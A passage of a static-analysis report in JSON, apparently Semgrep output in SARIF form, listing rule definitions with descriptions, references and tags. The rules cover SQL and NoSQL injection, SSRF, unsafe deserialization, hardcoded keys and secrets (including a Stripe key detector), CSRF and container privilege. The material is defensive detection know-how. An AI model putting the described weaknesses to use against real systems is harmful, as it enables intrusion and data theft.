[https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","id":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","name":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","id":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","name":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","id":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","name":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-dill-flask.tainted-dill-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"help":{"markdown":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open](https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open)\n","text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","id":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","name":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"help":{"markdown":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","id":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","name":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","id":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","name":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false","id":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","name":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-cookie-http-false.taint-cookie-http-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","id":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","name":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Stripe API Key detected"},"help":{"markdown":"Stripe API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Stripe API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","id":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","name":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"help":{"markdown":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST').\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping)\n - [https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING](https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING)\n","text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"helpUri":"https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","id":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","name":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"help":{"markdown":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod","id":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","name":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostpid-pod.hostpid-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `vm2`."},"help":{"markdown":"Make sure that unverified user data can not reach `vm2`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)\n","text":"Make sure that unverified user data can not reach `vm2`."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection","id":"javascript.express.security.express-vm2-injection.express-vm2-injection","name":"javascript.express.security.express-vm2-injection.express-vm2-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-vm2-injection.express-vm2-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"help":{"markdown":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","id":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","name":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","id":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","name":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli)\n - [https://www.rubydoc.info/gems/pg/PG/Connection](https://www.rubydoc.info/gems/pg/PG/Connection)\n","text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","id":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","name":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","id":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","name":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"help":{"markdown":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated)\n - 